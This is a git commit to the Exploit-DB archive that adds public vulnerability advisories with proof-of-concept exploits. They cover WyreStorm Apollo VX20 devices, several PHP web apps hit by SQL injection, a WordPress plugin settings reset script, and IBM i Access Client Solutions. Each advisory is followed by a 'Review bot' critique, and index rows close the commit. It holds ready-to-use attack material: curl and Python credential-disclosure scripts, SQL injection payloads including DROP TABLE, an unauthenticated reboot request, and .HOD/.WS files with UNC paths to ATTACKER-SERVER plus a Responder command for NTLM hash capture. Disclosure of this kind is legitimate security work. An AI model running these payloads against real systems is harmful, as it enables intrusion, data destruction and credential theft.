DB: 2024-02-27

12 changes to exploits/shellcodes/ghdb

Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'DoS'
Wyrestorm Apollo VX20 < 1.3.58 - Account Enumeration
Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure'
FAQ Management System v1.0 - 'faq' SQL Injection
Flashcard Quiz App v1.0 - 'card' SQL Injection
Simple Inventory Management System v1.0 - 'email' SQL Injection
comments-like-dislike < 1.2.0 - Authenticated (Subscriber+) Plugin Setting Reset
Online Shopping System Advanced - Sql Injection
taskhub 2.8.7 - SQL Injection
IBM i Access Client Solutions v1.1.2 - 1.1.4_ v1.1.4.3 - 1.1.9.4 - Remote Credential Theft
Exploit-DB 2024-02-27 00:16:33 +00:00
parent 624b24bca9
commit 9734fcef1e
12 changed files with 730 additions and 0 deletions


@ -0,0 +1,63 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.wyrestorm.com
[Product]
APOLLO VX20 < 1.3.58
[Vulnerability Type]
Incorrect Access Control (DOS)
[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58
[Affected Component]
Web interface, reboot and reset commands
[CVE Reference]
CVE-2024-25736
[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.
[Exploit/POC]
curl -k https://192.168.x.x/device/reboot
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
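Review bot: the [Affected Component] field names "reboot and reset commands", but the Security Issue text and the PoC cover only /device/reboot; either document the reset command's exposure to the same extent or narrow the field to what was actually verified. The advisory also never says what the device returns for the unauthenticated request (status code, body), which is exactly what an operator needs to confirm the fix after updating to 1.3.58; a one-line expected-response note would make the fix verifiable. Minor: the Disclosure Timeline mixes "Label: date" and "date : Label" formats.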


@ -0,0 +1,63 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.wyrestorm.com
[Product]
APOLLO VX20 < 1.3.58
[Vulnerability Type]
Account Enumeration
[CVE Reference]
CVE-2024-25734
[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered.
Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account.
[Exploit/POC]
TELNET x.x.x.x 23
username:aa
username:bb
username:admin
password:
[Network Access]
Remote
[Affected Product Code Base]
APOLLO VX20 - < 1.3.58, fixed in v1.3.58
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
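Review bot: the PoC transcript does not say what distinguishes the two outcomes; it should state explicitly that an unknown name is answered with a fresh "username:" prompt while a known name advances to "password:", since that difference is the whole finding. The [Affected Component] field present in the other two Apollo advisories is missing here (the Telnet service on port 23). The second sentence of the Security Issue paragraph is a comma splice ("...can determine valid accounts, this can potentially allow..."); split it. A line on mitigation beyond the firmware update, such as restricting which networks can reach port 23, would also help readers who cannot update immediately.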


@ -0,0 +1,83 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.wyrestorm.com
[Product]
APOLLO VX20 < 1.3.58
[Vulnerability Type]
Incorrect Access Control (Credentials Disclosure)
[Affected Component]
Web interface, config
[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58
[CVE Reference]
CVE-2024-25735
[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.
Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config
E.g. HTTP response snippet:
:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"}
,"softAp":{"password":"12345678","router":"y","softAp":"y"}...
[Exploit/POC]
import requests
target="https://x.x.x.x"
res = requests.get(target+"/device/config", verify=False)
idx=res.content.find('{"password":')
if idx != -1:
idx2=res.content.find('router')
if idx2 != -1:
print("[+] CVE-2024-25735 Credentials Disclosure")
print("[+] " + res.content[idx + 1:idx2 + 11])
print("[+] hyp3rlinx")
else:
print("[!] Apollo vX20 Device not vulnerable...")
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
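Review bot: the Python PoC will not run on Python 3 as written: res.content is bytes, so res.content.find('{"password":') raises TypeError; use res.text (or a bytes pattern) for both searches. The second search, res.content.find('router'), starts at offset 0 rather than at idx, so if the string "router" occurs anywhere before the softAp block the slice res.content[idx + 1:idx2 + 11] is wrong; pass idx as the start argument. In the Security Issue section the curl command is run together with the prose on one line; move it under [Exploit/POC]. The example response shows the SoftAP password in cleartext, so operators should rotate that password after updating to 1.3.58, which the advisory could say explicitly.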


@ -0,0 +1,64 @@
# Exploit Title: Simple Inventory Management System v1.0 - 'email' SQL Injection
# Google Dork: N/A
# Application: Simple Inventory Management System
# Date: 26.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.
## Proof of Concept (PoC):
An example attacker could input the following values:
email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'
pwd: test
This would result in the following SQL query:
SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'
This attack would retrieve all users, making the login process always successful.
request-response foto:https://i.imgur.com/slkzYJt.png
## Vulnerable code section:
====================================================
ims/login.php
<?php
ob_start();
session_start();
include('inc/header.php');
$loginError = '';
if (!empty($_POST['email']) && !empty($_POST['pwd'])) {
include 'Inventory.php';
$inventory = new Inventory();
// Vulnerable code
$login = $inventory->login($_POST['email'], $_POST['pwd']);
//
if(!empty($login)) {
$_SESSION['userid'] = $login[0]['userid'];
$_SESSION['name'] = $login[0]['name'];
header("Location:index.php");
} else {
$loginError = "Invalid email or password!";
}
}
?>
## Reproduce: https://packetstormsecurity.com/files/177294/Simple-Inventory-Management-System-1.0-SQL-Injection.html
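Review bot: the impact statement contradicts the PoC. "This attack would retrieve all users, making the login process always successful" describes an authentication bypass, but the payload shown, (select*from(select(sleep(20)))a), is a time-based blind probe that only delays the response; it returns no rows and does not bypass the password check, and the quoted query shows password = 'anything' while the PoC sends pwd: test. State the demonstrated impact as time-based blind SQL injection, or show a bypass payload together with the query it produces. The "Vulnerable code section" quotes ims/login.php, which only calls $inventory->login(); the string concatenation the description refers to lives in the login() method of Inventory.php, and that is the code that should be quoted. The fix is to bind both values with a prepared statement (mysqli or PDO) instead of interpolating them.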


@ -0,0 +1,46 @@
# Exploit Title: Flashcard Quiz App v1.0 - 'card' SQL Injection
# Google Dork: N/A
# Application: Flashcard Quiz App
# Date: 25.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
## Proof of Concept (PoC):
This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.
1. Original Code:
$card = $_GET['card'];
$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
2. Payload:
' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
3. Injected Query:
DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
Request Response foto: https://i.imgur.com/5IXvpiZ.png
## Vulnerable code section:
====================================================
endpoint/delete-flashcard.php
$card = $_GET['card'];
$query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
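Review bot: the payload and the "Injected Query" rely on stacked queries (the "; SELECT IF(...SLEEP(5)...)" after the DELETE). Whether a second statement executes depends on the database API the endpoint uses: mysqli_query() and mysql_query() reject multiple statements, while PDO with emulated prepares or mysqli_multi_query() run them. Since endpoint/delete-flashcard.php is quoted without the query call, either show that call or drop the stacked part; the ' OR '1'='1 fragment alone already makes the WHERE clause match every row in tbl_card, and that is the impact worth stating. A delete driven by a GET parameter should also be a POST with an authorization check, and tbl_card_id should be bound as an integer parameter.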


@ -0,0 +1,48 @@
# Exploit Title: FAQ Management System v1.0 - 'faq' SQL Injection
# Google Dork: N/A
# Application: FAQ Management System
# Date: 25.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.
## Proof of Concept (PoC):
An attacker can manipulate the 'faq' parameter to perform SQL injection. For example:
1. Original Request:
http://example.com/endpoint/delete-faq.php?faq=123
2.Malicious Request (SQL Injection):
http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --
This would result in a query like:
DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --
Which can lead to the deletion of data or even the entire table.
poc foto: https://i.imgur.com/1IENYFg.png
## Vulnerable code section:
====================================================
endpoint/delete-faq.php
$faq = $_GET['faq'];
// ...
$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";
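Review bot: the "DROP TABLE tbl_faq; --" part of the Malicious Request only runs if the code behind $query executes multiple statements (PDO with emulated prepares, mysqli_multi_query); the quoted snippet stops before the query call, so "deletion of the entire table" is unverified as written. The single-statement effect (a WHERE clause matching every row via ' OR '1'='1, as in the Flashcard advisory from the same author) would be a defensible impact statement, with the stacked-query case noted as driver-dependent. The Malicious Request URL is shown unencoded (spaces, semicolons, quotes), so it will not paste into a client as is, and "2.Malicious Request" is missing the space after the number. Fix: bind tbl_faq_id as an integer parameter in a prepared statement.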

62
exploits/php/webapps/51809.py Executable file

@ -0,0 +1,62 @@
# Exploit Title: POC-CVE-2023-3244
# Date: 9/12/2023
# Exploit Author: Diaa Hanna
# Software Link: [download link if available]
# Version: <= 1.2.0 comments-like-dislike
# Tested on: 1.1.6 comments-like-dislike
# CVE : CVE-2023-3244
#References
#https://nvd.nist.gov/vuln/detail/CVE-2023-3244
#The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin.
#This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users.
#For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244).
import requests
import argparse
import sys
from colorama import Fore
parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244',description='This is a proof of concept for the CVE-2023-3244 it is an access control vulnerability in the restore_settings function ')
parser.add_argument('-u','--username',help='username of a user on wordpress with low privileges',required=True)
parser.add_argument('-p',"--password",help='password of a user on wordpress with low privileges',required=True)
parser.add_argument('--url',help='the url of the vulnerable server (with http or https)',required=True)
parser.add_argument('--nossl',help='disable ssl verification',action='store_true',required=False,default=False)
args=parser.parse_args()
#check if the domain ends with a '/' if not then add it
url=args.url
if url[-1] != '/':
url+='/'
wp_login = f'{url}wp-login.php'
wp_admin = f'{url}wp-admin/'
username = args.username
password = args.password
session=requests.Session()
#logging in
session.post(wp_login, headers={'Cookie':'wordpress_test_cookie=WP Cookie check'}, data={'log':username, 'pwd':password, 'wp-submit':'Log In',
'redirect_to':wp_admin, 'testcookie':'1' },verify=not (args.nossl))
#if failed to login
if len(session.cookies.get_dict()) == 2:
print(Fore.RED +"Error Logging In Check Your Username and Password And Try Again")
sys.exit(1)
#making the ajax request to wp_ajax_cld_settings_restore_action this line will call the restore_settings function
#the restore_settings function does not check the sufficient privileges of a logged-in user
#even a subscriber can use this POC
response=session.get(f"{wp_admin}/admin-ajax.php?action=cld_settings_restore_action",verify=not (args.nossl))
if response.text == "Settings restored successfully.Redirecting...":
print(Fore.GREEN +"exploited excuted successfully")
print(Fore.YELLOW+ "settings of the comments-like-dislike plugin should be defaulted on the server")
sys.exit(0)
else:
print(Fore.RED + "some error occurred please read the source code of the poc it isn't that long anyway")
sys.exit(1)
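Review bot: the login-failure check "if len(session.cookies.get_dict()) == 2:" infers success from the number of cookies, which varies with the site's plugins and cookie settings; test for a cookie whose name starts with "wordpress_logged_in_" instead. wp_admin already ends in "/", so f"{wp_admin}/admin-ajax.php" produces "wp-admin//admin-ajax.php"; drop the extra slash. The header leaves "Software Link: [download link if available]" as a template placeholder, and "Version: <= 1.2.0" disagrees with the title used for the file in this commit ("< 1.2.0"); the NVD text quoted in the comments says "up to and including 1.2.0", so "<=" is the correct bound. With --nossl, verify=False makes urllib3 print an InsecureRequestWarning on every request, which should be suppressed or mentioned. "exploited excuted successfully" has a typo.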


@ -0,0 +1,67 @@
# Exploit Title: taskhub 2.8.7 - SQL Injection
# Exploit Author: CraCkEr
# Date: 05/09/2023
# Vendor: Infinitie Technologies
# Vendor Homepage: https://www.infinitietech.com/
# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
# Demo: https://taskhub.company/auth
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4987
# CWE: CWE-89 - CWE-74 - CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /home/get_tasks_list
GET parameter 'project' is vulnerable to SQL Injection
GET parameter 'status' is vulnerable to SQL Injection
GET parameter 'user_id' is vulnerable to SQL Injection
GET parameter 'sort' is vulnerable to SQL Injection
GET parameter 'search' is vulnerable to SQL Injection
https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]
---
Parameter: project (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
Parameter: status (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
Parameter: user_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
Parameter: sort (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=
Parameter: search (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW
---
[-] Done
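Review bot: the Description is generic text about SQL injection impact and does not say where in /home/get_tasks_list the five parameters reach the query or whether a later release fixes it; the header gives CVE-2023-4987, which belongs in the Description and in the CSV codes column. The sqlmap evidence shows "sort" injected as sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a), i.e. a value that lands in an ORDER BY clause; that one cannot be fixed with bind parameters and needs a column-name allowlist, which is worth saying alongside prepared statements for project, status, user_id and search.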


@ -0,0 +1,75 @@
# Exploit Title: Online Shopping System Advanced
# Date: 07.12.2023
# Exploit Author: Furkan Gedik
# Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software Link: https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Version: 1.0
# Tested on: [Kali Linux 2020.3]
# Description
Unauthorized access to a database by injecting malicious SQL statements. The SQL injection vulnerability occurs due to the inclusion of the user-provided "cm" parameter in the SQL query without proper filtering or sanitization. An attacker can exploit the vulnerability by injecting malicious SQL code in the "cm" parameter. Successful exploitation of the vulnerability results in the disclosure of sensitive information from the database, such as user credentials, which can be used to gain unauthorized access to the database.
# PoC
[+] sqlmap output
sqlmap.py -u "http://localhost/online-shopping-system-advanced/payment_success.php?st=Completed&cm=1" -p cm --dbms=mysql -technique=T --proxy=http://127.0.0.1:8080
Parameter: cm (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: st=Completed&cm=1' AND (SELECT 1415 FROM (SELECT(SLEEP(5)))NRHH) AND 'jLpV'='jLpV
# Vulnerability
https://github.com/PuneethReddyHC/online-shopping-system-advanced/blob/master/payment_success.php#L12-L22
[+] payment_success.php
if (isset($_GET["st"])) {
# code...
$trx_id = $_GET["tx"];
$p_st = $_GET["st"];
$amt = $_GET["amt"];
$cc = $_GET["cc"];
$cm_user_id = $_GET["cm"];
$c_amt = $_COOKIE["ta"];
if ($p_st == "Completed") {
include_once("db.php");
$sql = "SELECT p_id,qty FROM cart WHERE user_id = '$cm_user_id'";
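Review bot: the sqlmap command uses "-technique=T" with a single dash; the option is "--technique=T" (sqlmap's parser reads a single-dash form as the short option -t, the traffic-log file, with the remainder as its value), so the command as written does not select the time-based technique. The title "Online Shopping System Advanced" carries no version or parameter although the header states "Version: 1.0" and the issue is in "cm"; name it like the sibling entries ("... 1.0 - 'cm' SQL Injection"). The quoted payment_success.php stops at the "$sql = ..." line; include the execute call so readers can see that $cm_user_id goes straight into the query. The fix is to bind user_id as a parameter, or cast it to int if user ids are numeric.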


@ -0,0 +1,96 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.ibm.com
[Product]
IBM i Access Client Solutions
[Versions]
All
[Remediation/Fixes]
None
[Vulnerability Type]
Remote Credential Theft
[CVE Reference]
CVE-2024-22318
[Security Issue]
IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations.
Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server.
If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session.
The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.
[References]
https://www.ibm.com/support/pages/node/7116091
[Exploit/POC]
The client access .HOD File vulnerable parameters:
1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c
[KeyRemapFile]
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c
Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv
The client access legacy .WS File vulnerable parameters:
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c
Example, client access older .WS file
[Profile]
ID=WS
Version=9
[Telnet5250]
AssociatedPrinterStartMinimized=N
AssociatedPrinterTimeout=0
SSLClientAuthentication=Y
HostName=PWN
AssociatedPrinterClose=N
Security=CA400
CertSelection=AUTOSELECT
AutoReconnect=Y
[KeepAlive]
KeepAliveTimeOut=0
[Keyboard]
IBMDefaultKeyboard=N
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c
[Communication]
Link=telnet5250
[Network Access]
Remote
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: December 14, 2023
Vendor Addresses Issue: February 7, 2024
February 8, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
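Review bot: "[Remediation/Fixes] None" conflicts with the timeline entry "Vendor Addresses Issue: February 7, 2024" and with the IBM support reference; state what IBM actually published (a fixed version or a configuration recommendation) so readers know whether updating helps, and narrow "[Versions] All" to what was tested. The defensive measures that matter most are not mentioned: the leak requires the workstation to open an outbound SMB connection to an arbitrary host, so egress filtering of TCP 445 and the Windows "Network security: Restrict NTLM" policies block it regardless of the ACS fix, and opening .HOD/.WS files from untrusted sources is the trigger users should be warned about. Minor: the .HOD section lists two parameters but only the .WS example is shown as a complete file, and "Next, Kali Linux Responder.py to capture" is a sentence fragment.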


@ -10317,6 +10317,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15707,exploits/multiple/dos/15707.txt,"WonderWare InBatch 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",dos,multiple,,2010-12-08,2010-12-15,0,CVE-2010-4557;OSVDB-69936,,udpsz.zip,,,http://aluigi.org/adv/inbatch_1-adv.txt
33099,exploits/multiple/dos/33099.txt,"World in Conflict 1.0.1 - Typecheck Remote Denial of Service",2009-06-16,"Luigi Auriemma",dos,multiple,,2009-06-16,2014-05-01,1,,,,,,https://www.securityfocus.com/bid/35751/info
31957,exploits/multiple/dos/31957.txt,"World in Conflict 1.008 - Null Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",dos,multiple,,2008-06-23,2014-03-03,1,CVE-2008-6713;OSVDB-46533,,,,,https://www.securityfocus.com/bid/29888/info
51815,exploits/multiple/dos/51815.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'DoS'",2024-02-26,hyp3rlinx,dos,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25736,,,,,
26145,exploits/multiple/dos/26145.c,"Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service",2005-08-10,"Piotr Chytla",dos,multiple,,2005-08-10,2013-06-13,1,CVE-2005-2577;OSVDB-18698,,,,,https://www.securityfocus.com/bid/14536/info
5152,exploits/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,dos,multiple,,2008-02-18,,1,CVE-2007-5958,,,,,
25393,exploits/multiple/dos/25393.txt,"XAMPP - Insecure Default Password Disclosure",2005-04-12,"Morning Wood",dos,multiple,,2005-04-12,2013-05-13,1,CVE-2005-1078;OSVDB-15636,,,,,https://www.securityfocus.com/bid/13131/info
@ -11547,6 +11548,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19667,exploits/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Remote Buffer Overflow",1999-12-09,"Amanda Woodward",remote,multiple,,1999-12-09,2017-11-15,1,CVE-1999-0972;OSVDB-1158,,,,,https://www.securityfocus.com/bid/863/info
32987,exploits/multiple/remote/32987.txt,"Woodstock 4.2 404 - Error Page Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple,,2009-05-05,2014-04-23,1,CVE-2009-1554;OSVDB-54220,,,,,https://www.securityfocus.com/bid/34829/info
201,exploits/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,remote,multiple,21,2000-11-20,2016-12-04,1,OSVDB-11805;CVE-2000-0573,,,,http://www.exploit-db.comwu-ftpd-2.6.0-2.src.rpm,
51814,exploits/multiple/remote/51814.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Account Enumeration",2024-02-26,hyp3rlinx,remote,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25734,,,,,
51816,exploits/multiple/remote/51816.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure'",2024-02-26,hyp3rlinx,remote,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25735,,,,,
9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,remote,multiple,,2009-07-09,2017-04-01,1,CVE-2009-0695;OSVDB-55839,"Metasploit Framework (MSF)",,,,
1292,exploits/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",remote,multiple,21,2005-11-03,2018-01-18,1,OSVDB-19682;CVE-2005-3081,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwzdftpd-0.5.4.exe,
51111,exploits/multiple/remote/51111.txt,"X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)",2023-03-28,"Hosein Vita",remote,multiple,,2023-03-28,2023-03-28,0,CVE-2022-38580,,,,,
@ -12934,6 +12937,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Command Injection",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb
51749,exploits/php/remote/51749.TXT,"Equipment Rental Script-1.0 - SQLi",2024-01-29,nu11secur1ty,remote,php,,2024-01-29,2024-01-29,0,,,,,,
24018,exploits/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,remote,php,,2013-01-10,2013-01-10,1,OSVDB-88751,"Metasploit Framework (MSF)",,,,
51813,exploits/php/remote/51813.txt,"FAQ Management System v1.0 - 'faq' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
51812,exploits/php/remote/51812.txt,"Flashcard Quiz App v1.0 - 'card' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
